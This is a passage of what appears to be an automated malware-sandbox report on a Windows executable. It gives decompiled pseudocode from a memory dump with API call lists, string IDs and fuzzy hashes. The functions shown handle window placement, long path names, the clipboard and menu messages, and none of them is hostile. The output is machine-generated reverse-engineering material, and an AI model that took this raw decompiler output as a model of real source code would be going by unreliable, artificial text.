                                  								_t248 = E0044678C( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                  								_t199 = _t248 >> 1;
                                  								if(_t248 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							}
                                  							if(_t302 < 0) {
                                  								_t302 = 0;
                                  							}
                                  							if(_t199 < 0) {
                                  								_t199 = 0;
                                  							}
                                  							_t326 = _t199;
                                  							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  							if( *((char*)(_v8 + 0x57)) != 0) {
                                  								E00461A30(_v8, _t326);
                                  							}
                                  						} else {
                                  							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                  							__eflags = _t251 + 0xfa - 2;
                                  							if(_t251 + 0xfa - 2 >= 0) {
                                  								__eflags = _t251 - 5;
                                  								if(_t251 == 5) {
                                  									_t252 = _v8;
                                  									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                  									if( *((char*)(_t252 + 0x22f)) != 1) {
                                  										_t307 = E00464EA0() -  *(_v8 + 0x48);
                                  										__eflags = _t307;
                                  										_t308 = _t307 >> 1;
                                  										if(_t307 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t258 = E00464E94() -  *(_v8 + 0x4c);
                                  										__eflags = _t258;
                                  										_t259 = _t258 >> 1;
                                  										if(_t258 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									} else {
                                  										_t262 =  *0x4bcb7c; // 0x1c41284
                                  										_t311 = E00446748( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                  										__eflags = _t311;
                                  										_t308 = _t311 >> 1;
                                  										if(_t311 < 0) {
                                  											asm("adc ebx, 0x0");
                                  										}
                                  										_t266 =  *0x4bcb7c; // 0x1c41284
                                  										_t269 = E0044678C( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                  										__eflags = _t269;
                                  										_t259 = _t269 >> 1;
                                  										if(_t269 < 0) {
                                  											asm("adc eax, 0x0");
                                  										}
                                  									}
                                  									__eflags = _t308;
                                  									if(_t308 < 0) {
                                  										_t308 = 0;
                                  										__eflags = 0;
                                  									}
                                  									__eflags = _t259;
                                  									if(_t259 < 0) {
                                  										_t259 = 0;
                                  										__eflags = 0;
                                  									}
                                  									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								}
                                  							} else {
                                  								_t270 =  *0x4bcb7c; // 0x1c41284
                                  								_t370 =  *(_t270 + 0x44);
                                  								_t271 = _v8;
                                  								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                  								if( *((char*)(_t271 + 0x230)) == 7) {
                                  									_t362 =  *0x45ccbc; // 0x45cd08
                                  									_t290 = E004037A4( *(_v8 + 4), _t362);
                                  									__eflags = _t290;
                                  									if(_t290 != 0) {
                                  										_t370 =  *(_v8 + 4);
                                  									}
                                  								}
                                  								__eflags = _t370;
                                  								if(_t370 == 0) {
                                  									_t313 = E00464E70() -  *(_v8 + 0x48);
                                  									__eflags = _t313;
                                  									_t314 = _t313 >> 1;
                                  									if(_t313 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t277 = E00464E64() -  *(_v8 + 0x4c);
                                  									__eflags = _t277;
                                  									_t278 = _t277 >> 1;
                                  									if(_t277 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  								} else {
                                  									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                  									__eflags = _t317;
                                  									_t318 = _t317 >> 1;
                                  									if(_t317 < 0) {
                                  										asm("adc ebx, 0x0");
                                  									}
                                  									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                  									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                  									__eflags = _t286;
                                  									_t287 = _t286 >> 1;
                                  									if(_t286 < 0) {
                                  										asm("adc eax, 0x0");
                                  									}
                                  									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                  								}
                                  								__eflags = _t314;
                                  								if(_t314 < 0) {
                                  									_t314 = 0;
                                  									__eflags = 0;
                                  								}
                                  								__eflags = _t278;
                                  								if(_t278 < 0) {
                                  									_t278 = 0;
                                  									__eflags = 0;
                                  								}
                                  								_t328 = _t278;
                                  								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  								_t281 = _v8;
                                  								__eflags =  *((char*)(_t281 + 0x57));
                                  								if( *((char*)(_t281 + 0x57)) != 0) {
                                  									E00461A30(_v8, _t328);
                                  								}
                                  							}
                                  						}
                                  						 *((char*)(_v8 + 0x230)) = 0;
                                  						if( *((char*)(_v8 + 0x22f)) != 1) {
                                  							ShowWindow(E0044D590(_v8),  *(0x4a0fa8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                  						} else {
                                  							if( *(_v8 + 0x22b) != 2) {
                                  								ShowWindow(E0044D590(_v8),  *(0x4a0fa8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                  								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                  								__eflags = _t220;
                                  								CallWindowProcA(0x407034, E0044D590(_v8), 5, 0, _t220);
                                  								E00446FA4();
                                  							} else {
                                  								_t231 = E0044D590(_v8);
                                  								_t232 =  *0x4bcb7c; // 0x1c41284
                                  								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                  								ShowWindow(E0044D590(_v8), 3);
                                  							}
                                  							_t226 =  *0x4bcb7c; // 0x1c41284
                                  							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                  						}
                                  					}
                                  				}
                                  				_pop(_t331);
                                  				 *[fs:eax] = _t331;
                                  				_push(0x463b30);
                                  				_t154 = _v8;
                                  				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                  				return _t154;
                                  			}


                                  APIs
                                  • SendMessageA.USER32 ref: 0046395D
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID: ,dB
                                  • API String ID: 1946433856-1465247881
                                  • Opcode ID: 2902a0ffdb6b89ca15bca380394013b9d9f0993611f3192c7cf1c65aadb5d95a
                                  • Instruction ID: 968ff6dd98cb27b000d08eb0cd8059689d0198bfd324794eb7d3060a0c65b276
                                  • Opcode Fuzzy Hash: 2902a0ffdb6b89ca15bca380394013b9d9f0993611f3192c7cf1c65aadb5d95a
                                  • Instruction Fuzzy Hash: 1FF15C74A04284EFDB00DFA9D9C5F9E77F4AB04305F1441A6E904AB3A2E779BE01DB49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00405AA4(char* __eax, intOrPtr __edx) {
                                  				char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				char* _v20;
                                  				intOrPtr _v24;
                                  				_Unknown_base(*)()* _v28;
                                  				struct _WIN32_FIND_DATAA _v346;
                                  				char _v607;
                                  				char* _t75;
                                  				char* _t85;
                                  				void* _t108;
                                  				void* _t112;
                                  				struct HINSTANCE__* _t114;
                                  				void* _t115;
                                  				void* _t116;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v16 = _v8;
                                  				_t114 = GetModuleHandleA("kernel32.dll");
                                  				if(_t114 == 0) {
                                  					L4:
                                  					if( *_v8 != 0x5c) {
                                  						_v20 = _v8 + 2;
                                  						goto L10;
                                  					} else {
                                  						if( *((char*)(_v8 + 1)) == 0x5c) {
                                  							_v20 = E00405A78(_v8 + 2);
                                  							if( *_v20 != 0) {
                                  								_v20 = E00405A78(_v20 + 1);
                                  								if( *_v20 != 0) {
                                  									L10:
                                  									_t108 = _v20 - _v8;
                                  									_push(_t108 + 1);
                                  									_push(_v8);
                                  									_push( &_v607);
                                  									L00401350();
                                  									while( *_v20 != 0) {
                                  										_v24 = E00405A78(_v20 + 1);
                                  										_t112 = _v24 - _v20;
                                  										if(_t112 + _t108 + 1 <= 0x105) {
                                  											_push(_t112 + 1);
                                  											_push(_v20);
                                  											_push( &(( &_v607)[_t108]));
                                  											L00401350();
                                  											_t115 = FindFirstFileA( &_v607,  &_v346);
                                  											if(_t115 != 0xffffffff) {
                                  												FindClose(_t115);
                                  												_t75 =  &(_v346.cFileName);
                                  												_push(_t75);
                                  												L00401358();
                                  												if(_t75 + _t108 + 1 + 1 <= 0x105) {
                                  													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
                                  													_push(0x105 - _t108 - 1);
                                  													_push( &(_v346.cFileName));
                                  													_push( &(( &(( &_v607)[_t108]))[1]));
                                  													L00401350();
                                  													_t85 =  &(_v346.cFileName);
                                  													_push(_t85);
                                  													L00401358();
                                  													_t108 = _t108 + _t85 + 1;
                                  													_v20 = _v24;
                                  													continue;
                                  												}
                                  											}
                                  										}
                                  										goto L17;
                                  									}
                                  									_push(_v12);
                                  									_push( &_v607);
                                  									_push(_v8);
                                  									L00401350();
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
                                  					if(_v28 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0x105);
                                  						_push( &_v607);
                                  						_push(_v8);
                                  						if(_v28() == 0) {
                                  							goto L4;
                                  						} else {
                                  							_push(_v12);
                                  							_push( &_v607);
                                  							_push(_v8);
                                  							L00401350();
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  				return _v16;
                                  			}



















                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,004A00A4), ref: 00405AC1
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,00000000,?,004A00A4), ref: 00405AD2
                                  • lstrcpyn.KERNEL32(?,?,?,?,004A00A4), ref: 00405B06
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405B77
                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BB2
                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BC5
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BD2
                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,004A00A4), ref: 00405BDE
                                  • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00405C12
                                  • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00405C1E
                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00405C47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$kernel32.dll
                                  • API String ID: 3245196872-3214324292
                                  • Opcode ID: b7924c17d42b7d57107182fb1ba37407b3a0410cc5c986d2e9c1e5bc52d54a41
                                  • Instruction ID: c16df395c2a1ad26ff2f6ad30aaa355077f380372b78c042783e438d5ca8a1e7
                                  • Opcode Fuzzy Hash: b7924c17d42b7d57107182fb1ba37407b3a0410cc5c986d2e9c1e5bc52d54a41
                                  • Instruction Fuzzy Hash: E3511A71900619AFDB11EBA9CC89ADFB7B8EF44304F5405A6E415F7291D738AE408F68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0044D8A0(void* __eax) {
                                  				void* _v28;
                                  				struct _WINDOWPLACEMENT _v56;
                                  				struct tagPOINT _v64;
                                  				intOrPtr _v68;
                                  				void* _t43;
                                  				struct HWND__* _t45;
                                  				struct tagPOINT* _t47;
                                  
                                  				_t47 =  &(_v64.y);
                                  				_t43 = __eax;
                                  				if(IsIconic( *(__eax + 0x180)) == 0) {
                                  					GetWindowRect( *(_t43 + 0x180), _t47);
                                  				} else {
                                  					_v56.length = 0x2c;
                                  					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  				}
                                  				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                  					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                  					if(_t45 != 0) {
                                  						ScreenToClient(_t45, _t47);
                                  						ScreenToClient(_t45,  &_v64);
                                  					}
                                  				}
                                  				 *(_t43 + 0x40) = _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                  				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                  				return E00446370(_t43);
                                  			}











                                  APIs
                                  • IsIconic.USER32(?), ref: 0044D8AF
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 0044D8CC
                                  • GetWindowRect.USER32 ref: 0044D8E5
                                  • GetWindowLongA.USER32(?,000000F0), ref: 0044D8F3
                                  • GetWindowLongA.USER32(?,000000F8), ref: 0044D908
                                  • ScreenToClient.USER32(00000000), ref: 0044D915
                                  • ScreenToClient.USER32(00000000,?), ref: 0044D920
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: d695fc97d7989ff4c2387062a938f213c36b414262ce0d1f5f733a1281b4e392
                                  • Instruction ID: 8cccc5413464cead83d6c72cc5650485f778bac1b4378c5be7360fb8d141ed58
                                  • Opcode Fuzzy Hash: d695fc97d7989ff4c2387062a938f213c36b414262ce0d1f5f733a1281b4e392
                                  • Instruction Fuzzy Hash: 7A118E71908200AFDB41EF6DC885A9B77E8AF49314F04497EFD58DB386D738E9048B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E0043F6B0(void* __ebx, char __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				void* _t28;
                                  				void* _t34;
                                  				intOrPtr _t43;
                                  				void* _t46;
                                  				intOrPtr _t51;
                                  				intOrPtr _t53;
                                  				void* _t57;
                                  				void* _t58;
                                  				intOrPtr _t59;
                                  
                                  				_t57 = _t58;
                                  				_t59 = _t58 + 0xfffffff4;
                                  				_v8 = __edx;
                                  				E00404888(_v8);
                                  				_push(_t57);
                                  				_push(0x43f7e0);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t59;
                                  				if(OpenClipboard(0) == 0) {
                                  					_t43 =  *0x4bad14; // 0x426624
                                  					E0040CB80(_t43, 1);
                                  					E00403DEC();
                                  					_pop(_t51);
                                  					 *[fs:eax] = _t51;
                                  					_push(0x43f7e7);
                                  					return E004043D8( &_v8);
                                  				} else {
                                  					_push(_t57);
                                  					_push(0x43f7ac);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t59;
                                  					_v12 = GlobalAlloc(0x2002, E00404698(_v8) + 1);
                                  					_push(_t57);
                                  					_push(0x43f781);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t59;
                                  					_t28 = _v12;
                                  					GlobalFix(_t28);
                                  					_v16 = _t28;
                                  					_push(_t57);
                                  					_push(0x43f770);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t59;
                                  					_push(E00404698(_v8) + 1);
                                  					_t34 = E00404898(_v8);
                                  					_pop(_t46);
                                  					E00402D04(_t34, _t46, _v16);
                                  					EmptyClipboard();
                                  					SetClipboardData(1, _v12);
                                  					_pop(_t53);
                                  					 *[fs:eax] = _t53;
                                  					_push(0x43f777);
                                  					return GlobalUnWire(_v12);
                                  				}
                                  			}
















                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 0043F6D4
                                  • GlobalAlloc.KERNEL32(00002002,00000001,00000000,0043F7AC,?,00000000,0043F7E0), ref: 0043F6FE
                                  • GlobalFix.KERNEL32(?), ref: 0043F718
                                  • EmptyClipboard.USER32 ref: 0043F749
                                  • SetClipboardData.USER32 ref: 0043F754
                                  • GlobalUnWire.KERNEL32(?), ref: 0043F76A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ClipboardGlobal$AllocDataEmptyOpenWire
                                  • String ID: $fB
                                  • API String ID: 461592451-1802558387
                                  • Opcode ID: 8b792b2d8ac1b0ab78293e736dd5d8a684ce7d47b8d1a21e75b5dc90bcd722e9
                                  • Instruction ID: bb59d9d95091380884986bc9d156bbf03a32f95fc7828fb7c284fa9b77be642a
                                  • Opcode Fuzzy Hash: 8b792b2d8ac1b0ab78293e736dd5d8a684ce7d47b8d1a21e75b5dc90bcd722e9
                                  • Instruction Fuzzy Hash: 5F21E574A04644AFDB01FBA5CC53D6DBBBCEB49704B62047AF900E3691C73DAD10DA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0045B7EC(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				struct HMENU__* _v12;
                                  				signed int _v16;
                                  				char _v17;
                                  				intOrPtr _v24;
                                  				int _v28;
                                  				struct HDC__* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				intOrPtr _t137;
                                  				signed int _t138;
                                  				struct HWND__* _t144;
                                  				signed int _t150;
                                  				signed int _t151;
                                  				intOrPtr* _t153;
                                  				void* _t158;
                                  				struct HMENU__* _t160;
                                  				intOrPtr* _t165;
                                  				void* _t173;
                                  				signed int _t177;
                                  				signed int _t181;
                                  				void* _t182;
                                  				void* _t186;
                                  				void* _t214;
                                  				void* _t218;
                                  				void* _t252;
                                  				void* _t254;
                                  				signed int _t258;
                                  				void* _t266;
                                  				signed int _t272;
                                  				signed int _t273;
                                  				signed int _t275;
                                  				signed int _t276;
                                  				signed int _t278;
                                  				signed int _t279;
                                  				signed int _t281;
                                  				signed int _t282;
                                  				signed int _t284;
                                  				signed int _t285;
                                  				signed int _t287;
                                  				signed int _t288;
                                  				signed int _t291;
                                  				signed int _t292;
                                  				intOrPtr _t307;
                                  				intOrPtr _t329;
                                  				intOrPtr _t338;
                                  				intOrPtr _t342;
                                  				intOrPtr* _t349;
                                  				signed int _t351;
                                  				intOrPtr* _t352;
                                  				signed int _t363;
                                  				signed int _t364;
                                  				signed int _t365;
                                  				signed int _t366;
                                  				signed int _t367;
                                  				signed int _t368;
                                  				signed int _t369;
                                  				intOrPtr* _t371;
                                  				void* _t373;
                                  				void* _t374;
                                  				intOrPtr _t375;
                                  				void* _t376;
                                  
                                  				_t373 = _t374;
                                  				_t375 = _t374 + 0xffffffd0;
                                  				_t293 = 0;
                                  				_v52 = 0;
                                  				_t371 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t373);
                                  				_push(0x45bd1f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t375;
                                  				_t137 =  *__edx;
                                  				_t376 = _t137 - 0x111;
                                  				if(_t376 > 0) {
                                  					_t138 = _t137 - 0x117;
                                  					__eflags = _t138;
                                  					if(_t138 == 0) {
                                  						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t272;
                                  						if(_t272 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t273 = _t272 + 1;
                                  							_t363 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								_t150 = E0045AB68(E0041C834(_v8, _t293, _t363),  *(_t371 + 4), __eflags);
                                  								__eflags = _t150;
                                  								if(_t150 != 0) {
                                  									goto L68;
                                  								}
                                  								_t363 = _t363 + 1;
                                  								_t273 = _t273 - 1;
                                  								__eflags = _t273;
                                  								if(_t273 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  					} else {
                                  						_t151 = _t138 - 8;
                                  						__eflags = _t151;
                                  						if(_t151 == 0) {
                                  							_v17 = 0;
                                  							__eflags =  *(__edx + 6) & 0x00000010;
                                  							if(( *(__edx + 6) & 0x00000010) != 0) {
                                  								_v17 = 1;
                                  							}
                                  							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t275;
                                  							if(__eflags < 0) {
                                  								L32:
                                  								_t153 =  *0x4bb048; // 0x4bcb7c
                                  								E00467DB8( *_t153, 0, __eflags);
                                  								goto L67;
                                  							} else {
                                  								_t276 = _t275 + 1;
                                  								_t364 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									__eflags = _v17 - 1;
                                  									if(_v17 != 1) {
                                  										_v12 =  *(_t371 + 4) & 0x0000ffff;
                                  									} else {
                                  										_t160 =  *(_t371 + 8);
                                  										__eflags = _t160;
                                  										if(_t160 == 0) {
                                  											_v12 = 0xffffffff;
                                  										} else {
                                  											_v12 = GetSubMenu(_t160,  *(_t371 + 4) & 0x0000ffff);
                                  										}
                                  									}
                                  									_t158 = E0041C834(_v8, _t293, _t364);
                                  									_t293 = _v17;
                                  									_v16 = E0045AAAC(_t158, _v17, _v12);
                                  									__eflags = _v16;
                                  									if(__eflags != 0) {
                                  										break;
                                  									}
                                  									_t364 = _t364 + 1;
                                  									_t276 = _t276 - 1;
                                  									__eflags = _t276;
                                  									if(__eflags != 0) {
                                  										continue;
                                  									} else {
                                  										goto L32;
                                  									}
                                  									goto L68;
                                  								}
                                  								E00443E0C( *((intOrPtr*)(_v16 + 0x58)), _t293,  &_v52, __eflags);
                                  								_t165 =  *0x4bb048; // 0x4bcb7c
                                  								E00467DB8( *_t165, _v52, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t151 == 1;
                                  							if(_t151 == 1) {
                                  								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t278;
                                  								if(_t278 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t279 = _t278 + 1;
                                  									_t365 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v48 = E0041C834(_v8, _t293, _t365);
                                  										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                  										__eflags = _t173 -  *(_t371 + 8);
                                  										if(_t173 ==  *(_t371 + 8)) {
                                  											break;
                                  										}
                                  										_t293 = 1;
                                  										_t177 = E0045AAAC(_v48, 1,  *(_t371 + 8));
                                  										__eflags = _t177;
                                  										if(_t177 == 0) {
                                  											_t365 = _t365 + 1;
                                  											_t279 = _t279 - 1;
                                  											__eflags = _t279;
                                  											if(_t279 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  										} else {
                                  											break;
                                  										}
                                  										goto L68;
                                  									}
                                  									E0045B3DC(_v48, _t371);
                                  								}
                                  							} else {
                                  								goto L67;
                                  							}
                                  						}
                                  					}
                                  					goto L68;
                                  				} else {
                                  					if(_t376 == 0) {
                                  						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t281;
                                  						if(_t281 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t282 = _t281 + 1;
                                  							_t366 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								E0041C834(_v8, _t293, _t366);
                                  								_t181 = E0045AB4C( *(_t371 + 4), __eflags);
                                  								__eflags = _t181;
                                  								if(_t181 != 0) {
                                  									goto L68;
                                  								}
                                  								_t366 = _t366 + 1;
                                  								_t282 = _t282 - 1;
                                  								__eflags = _t282;
                                  								if(_t282 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  						goto L68;
                                  					} else {
                                  						_t182 = _t137 - 0x2b;
                                  						if(_t182 == 0) {
                                  							_v40 =  *((intOrPtr*)(__edx + 8));
                                  							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t284;
                                  							if(_t284 < 0) {
                                  								goto L67;
                                  							} else {
                                  								_t285 = _t284 + 1;
                                  								_t367 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_t186 = E0041C834(_v8, _t293, _t367);
                                  									_t293 = 0;
                                  									_v16 = E0045AAAC(_t186, 0,  *((intOrPtr*)(_v40 + 8)));
                                  									__eflags = _v16;
                                  									if(_v16 != 0) {
                                  										break;
                                  									}
                                  									_t367 = _t367 + 1;
                                  									_t285 = _t285 - 1;
                                  									__eflags = _t285;
                                  									if(_t285 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L67;
                                  									}
                                  									goto L69;
                                  								}
                                  								_v24 = E00428DB4(0, 1);
                                  								_push(_t373);
                                  								_push(0x45bb52);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t375;
                                  								_v28 = SaveDC( *(_v40 + 0x18));
                                  								_push(_t373);
                                  								_push(0x45bb35);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t375;
                                  								E0042955C(_v24,  *(_v40 + 0x18));
                                  								E004293D8(_v24);
                                  								E0045BFC4(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                  								_pop(_t329);
                                  								 *[fs:eax] = _t329;
                                  								_push(0x45bb3c);
                                  								__eflags = 0;
                                  								E0042955C(_v24, 0);
                                  								return RestoreDC( *(_v40 + 0x18), _v28);
                                  							}
                                  						} else {
                                  							_t214 = _t182 - 1;
                                  							if(_t214 == 0) {
                                  								_v44 =  *((intOrPtr*)(__edx + 8));
                                  								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t287;
                                  								if(_t287 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t288 = _t287 + 1;
                                  									_t368 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_t218 = E0041C834(_v8, _t293, _t368);
                                  										_t293 = 0;
                                  										_v16 = E0045AAAC(_t218, 0,  *((intOrPtr*)(_v44 + 8)));
                                  										__eflags = _v16;
                                  										if(_v16 != 0) {
                                  											break;
                                  										}
                                  										_t368 = _t368 + 1;
                                  										_t288 = _t288 - 1;
                                  										__eflags = _t288;
                                  										if(_t288 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L67;
                                  										}
                                  										goto L69;
                                  									}
                                  									_v32 = GetWindowDC( *(_v8 + 0x10));
                                  									 *[fs:eax] = _t375;
                                  									_v24 = E00428DB4(0, 1);
                                  									 *[fs:eax] = _t375;
                                  									_v28 = SaveDC(_v32);
                                  									 *[fs:eax] = _t375;
                                  									E0042955C(_v24, _v32);
                                  									E004293D8(_v24);
                                  									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x45bc53, _t373,  *[fs:eax], 0x45bc70, _t373,  *[fs:eax], 0x45bc95, _t373);
                                  									_pop(_t338);
                                  									 *[fs:eax] = _t338;
                                  									_push(0x45bc5a);
                                  									__eflags = 0;
